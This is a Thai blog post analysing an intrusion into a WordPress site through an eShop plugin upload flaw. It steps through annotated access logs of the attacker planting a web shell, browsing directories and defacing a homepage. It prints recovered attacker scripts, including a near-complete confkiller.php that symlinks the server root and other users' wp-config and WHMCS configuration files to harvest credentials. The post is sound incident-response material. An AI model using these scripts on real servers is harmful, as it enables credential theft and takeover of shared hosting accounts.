Track anonymous hacker (Hacked WordPress with eShop Plugin)
จากบทความ [1], [2] Case Study: Web sites hacked, WordPress โดนแฮก และการแกะรอยแฮกเกอร์
คราวนี้มาดูรายละเอียดจาก access_log ไฟล์กันบ้างครับ
### –> START: ACCESS YOUR SITE ###
[sourcecode]<br />180.244.249.92 - - [28/May/2013:14:48:27 +0700] "GET /wp-content/plugins/sitepress-multilingual-cms/res/css/language-selector.css?v=2.0.4.1 HTTP/1.1" 200 5615<br />180.244.249.92 - - [28/May/2013:14:48:25 +0700] "GET /category/coffee/bean/ HTTP/1.1" 200 50899<br />180.244.249.92 - - [28/May/2013:14:48:27 +0700] "GET /wp-content/themes/อีช้อปปิ้ง/library/css/slider.css HTTP/1.1" 200 2474<br />180.244.249.92 - - [28/May/2013:14:48:27 +0700] "GET /wp-content/themes/อีช้อปปิ้ง/library/css/superfish.css HTTP/1.1" 200 3633<br />180.244.249.92 - - [28/May/2013:14:48:27 +0700] "GET /wp-content/themes/อีช้อปปิ้ง/library/css/thickbox.css HTTP/1.1" 200 4014<br />180.244.249.92 - - [28/May/2013:14:48:27 +0700] "GET /wp-content/themes/อีช้อปปิ้ง/style.css HTTP/1.1" 200 35201<br />[/sourcecode]
### –> START ATTACKING ###
เปิดเว็บไซต์พาท /wp-content/themes/อีช้อปปิ้ง/upload/upload.php โดยใช่ช่องโหว่ของปลั๊กอิน จากนั้นแฮกเกอร์อัพโหลดไฟล์สคริปต์ (idca.php) ไฟล์นี้เข้ารหัสไว้มากกว่าหนึ่งฟังก์ชั่น
จากนั้นรันเรียกไฟล์สคริปต์ตามด้วยพาทที่ต้องการ (?y ดีฟอลล์พาทที่เก็บข้อมูลเว็บไซต์)
[sourcecode]<br />180.244.249.92 - - [28/May/2013:14:48:47 +0700] "POST /wp-content/themes/อีช้อปปิ้ง/upload/upload.php?img=&nonce= HTTP/1.1" 200 169<br />180.244.249.92 - - [28/May/2013:14:49:07 +0700] "GET /wp-content/uploads/products_img/idca.php HTTP/1.1" 200 4042<br />180.244.249.92 - - [28/May/2013:14:49:07 +0700] "GET /wp-content/uploads/products_img/idca.php?favicon HTTP/1.1" 303 -<br />180.244.249.92 - - [28/May/2013:14:49:08 +0700] "GET /wp-content/uploads/products_img/idca.php?favicon HTTP/1.1" 303 -<br />180.244.249.92 - - [28/May/2013:14:49:15 +0700] "POST /wp-content/uploads/products_img/idca.php HTTP/1.1" 200 1191961<br />180.244.249.92 - - [28/May/2013:14:49:21 +0700] "GET /wp-content/uploads/products_img/idca.php?y=/var/www/html/โดเมน-B/ HTTP/1.1" 200 19904<br />180.244.249.92 - - [28/May/2013:14:49:39 +0700] "GET /wp-content/uploads/products_img/idca.php?y=/var/www/html/โดเมน-B/ HTTP/1.1" 200 19904<br />[/sourcecode]
### –> [1] END ATTACKED SUCCESS ###
พยายามเจาะไปเรื่อยๆ จนแฮกเกอร์สามารถเรียกฟังก์ชั่นอัพโหลดผ่านไฟล์สคริปต์ idca.php แล้วทำการอัพโหลดไฟล์สคริปต์อื่นเขาไปยังรูทไดเรกทอรีของโดเมนนั้นๆ
[sourcecode]<br />180.244.249.92 - - [28/May/2013:14:49:41 +0700] "GET /wp-content/uploads/products_img/idca.php?y=/var/www/ HTTP/1.1" 200 27718<br />180.244.249.92 - - [28/May/2013:14:49:44 +0700] "GET /wp-content/uploads/products_img/idca.php?y=/var/www/html/ HTTP/1.1" 200 22856<br />180.244.249.92 - - [28/May/2013:14:49:51 +0700] "GET /wp-content/uploads/products_img/idca.php?y=/var/www/html/โดเมน-B-A/ HTTP/1.1" 200 20880<br />180.244.249.92 - - [28/May/2013:14:49:54 +0700] "GET /wp-content/uploads/products_img/idca.php?y=/var/www/html/ HTTP/1.1" 200 22856<br />180.244.249.92 - - [28/May/2013:14:49:59 +0700] "GET /wp-content/uploads/products_img/idca.php HTTP/1.1" 200 1191961<br />180.244.249.92 - - [28/May/2013:14:50:02 +0700] "GET /wp-content/uploads/products_img/idca.php?y=/var/www/html/โดเมน-B/httpd/html/ช้อป/ HTTP/1.1" 200 121198<br />180.244.249.92 - - [28/May/2013:14:50:05 +0700] "GET /wp-content/uploads/products_img/idca.php?y=/var/www/html/โดเมน-B/httpd/html/ช้อป/&x=upload HTTP/1.1" 200 13665<br />180.244.249.92 - - [28/May/2013:14:50:10 +0700] "POST /wp-content/uploads/products_img/idca.php?y=/var/www/html/โดเมน-B/httpd/html/ช้อป/&x=upload HTTP/1.1" 200 13730<br />180.244.249.92 - - [28/May/2013:14:50:54 +0700] "GET /wp-content/uploads/products_img/idca.php?y=/var/www/html/โดเมน-B/httpd/html/ช้อป/ HTTP/1.1" 200 124263<br />180.244.249.92 - - [28/May/2013:14:51:07 +0700] "POST /wp-content/uploads/products_img/idca.php?y=/var/www/html/โดเมน-B/httpd/html/ช้อป/ HTTP/1.1" 200 124383<br />180.244.249.92 - - [28/May/2013:14:51:12 +0700] "GET /wp-content/uploads/products_img/idca.php?y=/var/www/html/โดเมน-B/httpd/html/ช้อป/ HTTP/1.1" 200 124383<br />180.244.249.92 - - [28/May/2013:14:51:18 +0700] "GET /wp-content/uploads/products_img/idca.php?y=/var/www/html/โดเมน-B/httpd/html/ช้อป/&edit=/var/www/html/โดเมน-B/httpd/html/ช้อป/newfile.php HTTP/1.1" 200 12513<br />180.244.249.92 - - [28/May/2013:14:51:27 +0700] "POST /wp-content/uploads/products_img/idca.php?y=/var/www/html/โดเมน-B/httpd/html/ช้อป/&edit=/var/www/html/โดเมน-B/httpd/html/ช้อป/newfile.php HTTP/1.1" 200 46661<br />[/sourcecode]
### –> [2] END ATTACKED SUCCESS ###
ดูเหมือนทำงานกันเป็นทีมเล็กๆ โดยพยายามเจาะเข้าหน้า admin ของ WordPress ด้วย
[Indonesian and Chaina]
[sourcecode]<br />180.244.249.92 - - [28/May/2013:14:53:12 +0700] "GET /files.php HTTP/1.1" 200 2832<br />142.4.101.26 - - [28/May/2013:14:53:12 +0700] "GET /wp-login.php HTTP/1.0" 200 2245<br />[/sourcecode]
อัพโหลดไฟล์ files.php สำเร็จ
[sourcecode]<br />180.244.249.92 - - [28/May/2013:14:53:14 +0700] "GET /files.php?sws=sym HTTP/1.1" 200 2202<br />142.4.101.26 - - [28/May/2013:14:53:13 +0700] "POST /wp-login.php HTTP/1.0" 302 -<br />180.244.249.92 - - [28/May/2013:14:53:14 +0700] "GET /files.php?sws=read HTTP/1.1" 200 2600<br />[/sourcecode]
### –> [3] END ATTACKED SUCCESS ###
อัพโหลดไฟล์เพิ่มเติม confkiller.php
[sourcecode]<br />180.244.249.92 - - [28/May/2013:14:53:21 +0700] "GET /wp-content/uploads/products_img/idca.php HTTP/1.1" 200 1191961<br />180.244.249.92 - - [28/May/2013:14:53:24 +0700] "GET /wp-content/uploads/products_img/idca.php?y=/var/www/html/โดเมน-B/httpd/html/ช้อป/ HTTP/1.1" 200 129458<br />180.244.249.92 - - [28/May/2013:14:53:26 +0700] "GET /wp-content/uploads/products_img/idca.php?y=/var/www/html/โดเมน-B/httpd/html/ช้อป/&x=upload HTTP/1.1" 200 13665<br />180.244.249.92 - - [28/May/2013:14:53:32 +0700] "POST /wp-content/uploads/products_img/idca.php?y=/var/www/html/โดเมน-B/httpd/html/ช้อป/&x=upload HTTP/1.1" 200 13734<br />180.244.249.92 - - [28/May/2013:14:53:42 +0700] "POST /confkiller.php HTTP/1.1" 200 5422 #<--Hacker: upload file name "files.php"<br />180.244.249.92 - - [28/May/2013:14:53:43 +0700] "POST /confkiller.php HTTP/1.1" 200 5243 #<--Hacker: upload file name "confkiller.php"<br />[/sourcecode]
### –> [4] END ATTACKED SUCCESS ###
สั่งผ่านเว็บเบราว์เซอร์เรียกสคริปต์ไฟล์ confkiller.php ทำงาน
[sourcecode]<br />180.244.249.92 - - [28/May/2013:14:53:45 +0700] "GET /INDISHELL/ HTTP/1.1" 200 705<br />[/sourcecode] [sourcecode]<br />180.244.249.92 - - [28/May/2013:14:54:09 +0700] "GET /files.php?sws=read HTTP/1.1" 200 2600<br />180.244.249.92 - - [28/May/2013:14:54:11 +0700] "GET /confkiller.php HTTP/1.1" 200 4842<br />180.244.249.92 - - [28/May/2013:14:54:12 +0700] "GET /wp-content/uploads/products_img/idca.php?y=/var/www/html/โดเมน-B/httpd/html/ช้อป/&x=upload HTTP/1.1" 200 13665<br />180.244.249.92 - - [28/May/2013:14:54:15 +0700] "GET /wp-content/uploads/products_img/idca.php?y=/var/www/html/โดเมน-B/httpd/html/ช้อป/ HTTP/1.1" 200 136865<br />180.244.249.92 - - [28/May/2013:14:54:20 +0700] "GET /wp-content/uploads/products_img/idca.php?y=/var/www/html/ HTTP/1.1" 200 22856<br />180.244.249.92 - - [28/May/2013:14:54:23 +0700] "GET /files.php?sws=read HTTP/1.1" 200 2600<br />180.244.249.92 - - [28/May/2013:14:54:25 +0700] "GET /files.php?sws=passwd HTTP/1.1" 200 5520<br />**************<br />180.244.249.92 - - [28/May/2013:14:54:26 +0700] "POST /files.php?sws=passwd&save=1 HTTP/1.1" 200 21005<br />**************<br />180.244.249.92 - - [28/May/2013:14:54:29 +0700] "GET /files.php?sws=sym HTTP/1.1" 200 2202<br />180.244.249.92 - - [28/May/2013:14:54:34 +0700] "GET /files.php?sws=read HTTP/1.1" 200 2600<br />180.244.249.92 - - [28/May/2013:14:54:36 +0700] "GET /files.php?sws=joomla HTTP/1.1" 200 2202<br />180.244.249.92 - - [28/May/2013:14:54:36 +0700] "GET /files.php?sws=read HTTP/1.1" 200 2600<br />180.244.249.92 - - [28/May/2013:14:54:37 +0700] "GET /files.php?sws=wp HTTP/1.1" 200 2202<br />180.244.249.92 - - [28/May/2013:14:54:37 +0700] "GET /files.php?sws=read HTTP/1.1" 200 2600<br />180.244.249.92 - - [28/May/2013:14:54:38 +0700] "GET /files.php?sws=vb HTTP/1.1" 200 2202<br />180.244.249.92 - - [28/May/2013:14:54:38 +0700] "GET /files.php?sws=read HTTP/1.1" 200 2600<br />180.244.249.92 - - [28/May/2013:14:54:41 +0700] "GET /files.php? HTTP/1.1" 200 2832<br />[/sourcecode]
เป็นอันเรียบร้อย หน้าหลักโฮมเพจ
### –> [5] START: ATTACK UNSUCCESSFUL ###
พยายามเจาะเข้าไปยังโดเมนที่เหลือต่อ
[sourcecode]<br />**************<br />180.244.249.92 - - [28/May/2013:14:54:48 +0700] "GET /wp-content/uploads/products_img/idca.php?y=/var/www/html/โดเมน-B-A/ HTTP/1.1" 200 20880<br />**************<br />180.244.249.92 - - [28/May/2013:14:54:52 +0700] "GET /wp-content/uploads/products_img/idca.php?y=/var/www/html/โดเมน-B-A/httpd/ HTTP/1.1" 200 30970<br />180.244.249.92 - - [28/May/2013:14:55:24 +0700] "GET /wp-content/uploads/products_img/idca.php?y=/var/www/html/โดเมน-B-A/httpd/html/ HTTP/1.1" 200 99678<br />180.244.249.92 - - [28/May/2013:14:55:52 +0700] "GET /wp-content/uploads/products_img/idca.php?y=/var/www/html/โดเมน-B-A/httpd/html/&x=upload HTTP/1.1" 200 14128<br />180.244.249.92 - - [28/May/2013:14:55:57 +0700] "POST /wp-content/uploads/products_img/idca.php?y=/var/www/html/โดเมน-B-A/httpd/html/&x=upload HTTP/1.1" 200 14155<br />180.244.249.92 - - [28/May/2013:14:56:04 +0700] "GET /wp-content/uploads/products_img/idca.php?y=/var/www/html/โดเมน-B-A/httpd/html/ HTTP/1.1" 200 99678<br />180.244.249.92 - - [28/May/2013:14:56:15 +0700] "POST /wp-content/uploads/products_img/idca.php?y=/var/www/html/โดเมน-B-A/httpd/html/ HTTP/1.1" 200 99678<br />180.244.249.92 - - [28/May/2013:14:56:51 +0700] "GET /wp-content/uploads/products_img/idca.php?y=/var/www/html/ HTTP/1.1" 200 22856<br />180.244.249.92 - - [28/May/2013:14:56:55 +0700] "GET /wp-content/uploads/products_img/idca.php?y=/var/www/html/โดเมน-C/ HTTP/1.1" 200 17516<br />180.244.249.92 - - [28/May/2013:14:57:16 +0700] "GET /wp-content/uploads/products_img/idca.php?y=/var/www/html/โดเมน-C/httpd/ HTTP/1.1" 200 28180<br />180.244.249.92 - - [28/May/2013:14:57:26 +0700] "GET /wp-content/uploads/products_img/idca.php?y=/var/www/html/โดเมน-C/httpd/html/ HTTP/1.1" 200 146442<br />180.244.249.92 - - [28/May/2013:14:57:31 +0700] "GET /wp-content/uploads/products_img/idca.php?y=/var/www/html/โดเมน-C/httpd/html/&x=upload HTTP/1.1" 200 13852<br />180.244.249.92 - - [28/May/2013:14:57:37 +0700] "POST /wp-content/uploads/products_img/idca.php?y=/var/www/html/โดเมน-C/httpd/html/&x=upload HTTP/1.1" 200 13879<br />180.244.249.92 - - [28/May/2013:14:57:45 +0700] "GET /wp-content/uploads/products_img/idca.php?y=/var/www/html/ HTTP/1.1" 200 22856<br />180.244.249.92 - - [28/May/2013:14:57:47 +0700] "GET /wp-content/uploads/products_img/idca.php?y=/var/www/html/โดเมน-D/ HTTP/1.1" 200 47166<br />[/sourcecode]
### –> END: ATTACK UNSUCCESSFUL ###
ไม่สำเร็จ นอนดีกว่า :-
ตัวอย่าง ไฟล์สคริปต์ files.php
[sourcecode]<br />@mkdir('sym',0777);<br />$htcs = "Options all \n DirectoryIndex Sux.html \n AddType text/plain .php \n AddHandler server-parsed .php \n AddType text/plain .html \n AddHandler txt .html \n Require None \n Satisfy Any";<br />$f =@fopen ('sym/.htaccess','w');<br />fwrite($f , $htcs);<br /><br />@symlink("/","sym/root");<br /><br />$pg = basename(__FILE__);<br /><br /><%%KEEPWHITESPACE%%> ////////// WordPress ////////////<br /><br />$pos = strpos($wp, "200");<br />$config="&nbsp;";<br /><br />if (strpos($wp, "200") == true )<br />{<br /><%%KEEPWHITESPACE%%> $config="<a href='".$wpl."' target='_blank'>Wordpress</a>";<br />}<br />elseif (strpos($wp12, "200") == true)<br />{<br /><%%KEEPWHITESPACE%%> $config="<a href='".$wp2."' target='_blank'>Wordpress</a>";<br />}<br />[/sourcecode]
ตัวอย่าง ไฟล์สคริปต์ confkiller.php
[sourcecode]<br /><?php<br /><%%KEEPWHITESPACE%%> error_reporting(0);<br /><%%KEEPWHITESPACE%%> echo "<font color=red size=2 face=\"comic sans ms\">";<br /><%%KEEPWHITESPACE%%> if(isset($_POST['su']))<br /><%%KEEPWHITESPACE%%> {<br /><%%KEEPWHITESPACE%%> mkdir('Indishell',0777);<br />$rr = " Options all \n DirectoryIndex Sux.html \n AddType text/plain .php \n AddHandler server-parsed .php \n AddType text/plain .html \n AddHandler txt .html \n Require None \n Satisfy Any";<br />$g = fopen('Indishell/.htaccess','w');<br />fwrite($g,$rr);<br />$indishell = symlink("/","Indishell/root");<br /><%%KEEPWHITESPACE%%> $rt="<a href=Indishell/root><font color=white size=3 face=\"comic sans ms\"> OwN3d</font></a>";<br /><%%KEEPWHITESPACE%%> echo "Bhai ji .... check link given below for / folder symlink <br><u>$rt</u>";<br /><br /><%%KEEPWHITESPACE%%> $dir=mkdir('INDISHELL',0777);<br /><%%KEEPWHITESPACE%%> $r = " Options all \n DirectoryIndex Sux.html \n AddType text/plain .php \n AddHandler server-parsed .php \n AddType text/plain .html \n AddHandler txt .html \n Require None \n Satisfy Any";<br /><%%KEEPWHITESPACE%%> $f = fopen('INDISHELL/.htaccess','w');<br /><br /><%%KEEPWHITESPACE%%> fwrite($f,$r);<br /><%%KEEPWHITESPACE%%> $consym="<a href=INDISHELL/><font color=white size=3 face=\"comic sans ms\">configuration files</font></a>";<br /><%%KEEPWHITESPACE%%> echo "<br>The link given below for configuration file symlink...open it, once processing finish <br><u><font color=red size=2 face=\"comic sans ms\">$consym</font></u>";<br /><br /><%%KEEPWHITESPACE%%> $usr=explode("\n",$_POST['user']);<br /><%%KEEPWHITESPACE%%> $configuration=array("wp-config.php","wordpress/wp-config.php","configuration.php","blog/wp-config.php","joomla/configuration.php","vb/includes/config.php","includes/config.php","conf_global.php","inc/config.php","config.php","Settings.php","sites/default/settings.php","whm/configuration.php","whmcs/configuration.php","support/configuration.php","whmc/WHM/configuration.php","whm/WHMCS/configuration.php","whm/whmcs/configuration.php","support/configuration.php","clients/configuration.php","client/configuration.php","clientes/configuration.php","cliente/configuration.php","clientsupport/configuration.php","billing/configuration.php","admin/config.php");<br /><%%KEEPWHITESPACE%%> foreach($usr as $uss )<br /><%%KEEPWHITESPACE%%> {<br /><%%KEEPWHITESPACE%%> $us=trim($uss);<br /><br /><%%KEEPWHITESPACE%%> foreach($configuration as $c)<br /><%%KEEPWHITESPACE%%> {<br /><%%KEEPWHITESPACE%%> $rs="/home/".$us."/public_html/".$c;<br /><%%KEEPWHITESPACE%%> $r="INDISHELL/".$us." .. ".$c;<br /><%%KEEPWHITESPACE%%> symlink($rs,$r);<br /><br /><%%KEEPWHITESPACE%%> }<br /><br /><%%KEEPWHITESPACE%%> }<br /><br /><%%KEEPWHITESPACE%%> }<br /><br /><%%KEEPWHITESPACE%%> ?><br />[/sourcecode]
ตัวอย่าง ไฟล์สคริปต์ idca.php (Decoded ออกมาแล้ว by unphp.net)
[sourcecode]<br /><form method="post"><br /><br /><%%KEEPWHITESPACE%%> <a href="?error"><img src="?favicon" style="margin:2px;vertical-align:middle;" /></a><br /><br /><span class="gaya">root@IDCA:~#</span><input id="login" class="inputz" type="password" name="pass" style="width:120px;" value="" /><br /><br /><%%KEEPWHITESPACE%%> <input class="inputzbut" type="submit" value="Go !" name="submitlogin" style="width:80px;" /><br /><br /><%%KEEPWHITESPACE%%> </form><br /><br /><%%KEEPWHITESPACE%%> </div><br /><br /></td></tr></table><br /><br /><form method=post><br /><br /><p class="footer">./Cyber404 | Mr-GanDrunX &copy;2013</p><br /><br /></form><br />[/sourcecode]
สรุป คือแฮกเกอร์พยายามเจาะเข้าระบบทุกโดเมนบนเว็บโฮตส์ติ้ง แต่แฮกได้เฉพาะผู้ที่ใช้ eShop WordPress Plugin แล้วทำการเปลี่ยนแปลงข้อมูลหน้าโฮมเพจ
และทำลิงก์แสดงข้อมูลไดร์เรกทอรีของระบบ การตรวจสอบเบื้องต้นไม่พบว่ามีข้อมูลสำคัญหลุดออกไป ช่องโหว่เกิดจากเครื่องมือ eShop และแฮกเกอร์ไม่ได้ใช้ทางช่องโหว่ของ WordPress (แต่ผู้ต้องอัพเดท WordPress ไปเป็นเวอร์ชั่นล่าสุด)
2 thoughts on “Track anonymous hacker (Hacked WordPress with eShop Plugin)”
ขอบคุณมากๆ สำหรับความรู้ดีๆที่ละเอียดยิบแบบนี้ค่ะ ปลั๊กอินน่ากลัวจังเลย
ปลั๊กอินมี bug แค่นั้นครับ ปลั๊กดีๆ มีประโยชน์ก็เยอะ
10 ปลั๊กอินดีๆ สำหรับ WordPress (WordPress SEO plugin to optimize your site)
//blog.susethailand.com/?p=2860